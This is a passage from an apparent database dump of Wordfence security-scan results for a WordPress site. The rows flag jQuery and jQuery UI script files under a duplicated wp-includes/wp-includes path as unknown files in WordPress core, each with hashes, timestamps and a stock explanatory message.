More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34236,1631564697,1631564697,'new','knownfile',75,'b19f9c1c02009dafce41810361bea02d','a378d14dfd76fca05a7482b15f3a9b20','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34237,1631564697,1631564697,'new','knownfile',75,'47845394fd97baca9c4fca42ad1b3fc6','a2aafc04ee6f1e4246f4484ef86cd7de','Unknown file in WordPress core: wp-includes/wp-includes/js/jcrop/Jcrop.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/jcrop/Jcrop.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34238,1631564697,1631564697,'new','knownfile',75,'0338735e5d8becf92034629443014bb4','03f2f6573707a1b564f3eda4d312692a','Unknown file in WordPress core: wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34239,1631564697,1631564697,'new','knownfile',75,'5e36b771360e7df1fb83a04b08b3ebf5','d69de372a7320fb630118aee82131017','Unknown file in WordPress core: wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34240,1631564697,1631564697,'new','knownfile',75,'8c97c2e2e4a326b56f29147b78046ee5','b6159f800c36ce90c9fccc44742dab55','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery-migrate.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/jquery-migrate.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34241,1631564697,1631564697,'new','knownfile',75,'e5de5514e2fcb6db9e732f153eb48de7','ec77fec0d866bfb4b8b18422772c5a9f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery-migrate.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/jquery-migrate.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34242,1631564697,1631564697,'new','knownfile',75,'a28c7118b1c5279c1662f73dcf67bc80','54df4103a7d5fcc05595d9912cec7793','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.color.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/jquery.color.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34243,1631564697,1631564697,'new','knownfile',75,'21abe5e52c1cd3f1a8af065dd909f403','7e07c12f46614e6658252971e01b8a28','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.form.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/jquery.form.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34244,1631564697,1631564697,'new','knownfile',75,'804de3aae700746fe1ec67c7d91e4882','ba7a6aab719472f3421dd221be6308a1','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.form.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/jquery.form.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34245,1631564698,1631564698,'new','knownfile',75,'6466860b1bb05e8fd9bf3ba0e79a24db','c6d637adefc9301feda1e07f8746481b','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.hotkeys.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/jquery.hotkeys.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34246,1631564698,1631564698,'new','knownfile',75,'83834c9d1b451e34795ad05d3b4113b8','d8202dce7483ffe54185b82c9db077f9','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.hotkeys.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/jquery.hotkeys.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34247,1631564698,1631564698,'new','knownfile',75,'75df260005b15f77e83e1f2bc98085fb','e09904360147f4c0e5779244772c91fd','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/jquery/jquery.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34248,1631564698,1631564698,'new','knownfile',75,'72a9926e32447d482f16de68bd0fb363','e573f6df66e80e0a016725305979f8b2','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.masonry.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/jquery.masonry.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34249,1631564698,1631564698,'new','knownfile',75,'cbbf56cf14d6226d356bb3772c0797ec','5a41d56f531e936c198b4a8e150a56a6','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/jquery/jquery.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34250,1631564698,1631564698,'new','knownfile',75,'1ae87eeaaaaf2c6d55b638cf1e060cfe','f2843a01757bbedb5915da148e1ecad5','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.query.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/jquery.query.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34251,1631564698,1631564698,'new','knownfile',75,'f7446322df273affaca00faa3c8b5677','545186c3bc2475250a4f6d16c9977397','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.schedule.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/jquery.schedule.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34252,1631564698,1631564698,'new','knownfile',75,'e06f4c246cd027946309a490d5c1d553','11e860894c169e9b213148817fafa61c','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.serialize-object.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/jquery/jquery.serialize-object.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34253,1631564698,1631564698,'new','knownfile',75,'dbd8c9aa2856973cb84b167638f637b5','bd401c1496c60a1857254a1b29b9efa4','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34254,1631564698,1631564698,'new','knownfile',75,'1550f6ed4af0fee36a23193e89ac7fa1','0740e1da5ccef1d0c2fc3b51e5ba2f92','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34255,1631564698,1631564698,'new','knownfile',75,'0dfdf6b050ccc30e7cf14807bfd6de9b','56dfc0c07c9e61f9c4123c661fd4700e','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.ui.touch-punch.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/jquery/jquery.ui.touch-punch.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34256,1631564698,1631564698,'new','knownfile',75,'ed1496288d7d9b0212e8920610afc2af','9089ea86c0333513b5e746cbac25c173','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/suggest.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/jquery/suggest.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34257,1631564698,1631564698,'new','knownfile',75,'ec2db57b1d23f60f960e0e5e870f724f','fb779578816bc3af82b58f8397449292','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/suggest.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/suggest.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34258,1631564698,1631564698,'new','knownfile',75,'9df65606190b4ad69d55925482cd9d50','837069c3c91f47003c358234e58b2d55','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/accordion.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/accordion.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34259,1631564698,1631564698,'new','knownfile',75,'4a76c53c2862392d885fcc49cad5fb54','0c1423bfcd1567d5cecdf973dd4fb041','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/accordion.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/accordion.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34260,1631564698,1631564698,'new','knownfile',75,'dc316159c8b502e20963b95327d676e9','72b63bb26009516e7cd2fadc45ccf098','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/autocomplete.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/autocomplete.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34261,1631564698,1631564698,'new','knownfile',75,'81e57f425c08fa419201e5a564ca26df','ecef63e38f2436b6cc159e743d5e589d','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/autocomplete.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/autocomplete.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34262,1631564698,1631564698,'new','knownfile',75,'a36e1763140b2f9d2a2bb986768a9ab3','086775fc2e7cbeaa279e822b13c94b1c','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/button.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/jquery/ui/button.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34263,1631564698,1631564698,'new','knownfile',75,'8ec810903bdaaf841ea13783250d4502','91c66865117c09f56b3621f56ec81d80','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/button.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/button.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34264,1631564698,1631564698,'new','knownfile',75,'650c52abc5066d8b15547b1af58563e9','46b01e0c51f1a2326dbb59aeb1cf82d3','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/checkboxradio.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/checkboxradio.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34265,1631564698,1631564698,'new','knownfile',75,'6aa5fd4b7509ac81b0ecf9a99af78736','a87c4384383a83e47d0a578518eb3893','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/checkboxradio.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/jquery/ui/checkboxradio.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34266,1631564698,1631564698,'new','knownfile',75,'e34ef1bbfd09d36dcb9ec99fef2f9c65','035c016f37c2ff47263e517a433fc80f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/controlgroup.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/controlgroup.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34267,1631564698,1631564698,'new','knownfile',75,'07943477864869f93d2acdf93f132e99','20c71a970edd0923f0efa5d82d6e4a11','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/controlgroup.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/controlgroup.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34268,1631564698,1631564698,'new','knownfile',75,'0163a00cd1c9521237898cb2f8069e36','94d5179b54f91b49edeb32521978da43','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/core.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/jquery/ui/core.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34269,1631564698,1631564698,'new','knownfile',75,'1ef73377ea1b807bf4091949c54f8d84','907472e61c099cc9960d57768287926b','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/core.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/ui/core.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34270,1631564698,1631564698,'new','knownfile',75,'c725989ae29016de28cdfe6fa6e781b7','d3f27f8d05d1b58c355e96d3e61e9e4d','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/datepicker.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/datepicker.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34271,1631564699,1631564699,'new','knownfile',75,'d04847ca26db9d5025033372808dda32','e1aa793f2c2ed4451e5d4a036a53f903','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/datepicker.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/datepicker.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34272,1631564699,1631564699,'new','knownfile',75,'e28d214708ef162840e403b1cf2ac55f','03dd768c7082fafd04758961526b5438','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/dialog.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/jquery/ui/dialog.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34273,1631564699,1631564699,'new','knownfile',75,'73739fd4fa8a87ab77bc54cb66fdabf2','bcb98aed8f862b27e52225cecb1e7bc7','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/dialog.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/dialog.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34274,1631564699,1631564699,'new','knownfile',75,'2f47f1ea252598ad0972e5fe4fa0b6bb','ad312bd69135a66f25d009cb2982aea4','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/draggable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/draggable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34275,1631564699,1631564699,'new','knownfile',75,'08807b82d2d70492d2853add9ab72095','e2774b15951bf4009ceea44a9d491af1','Unknown file in WordPress core: 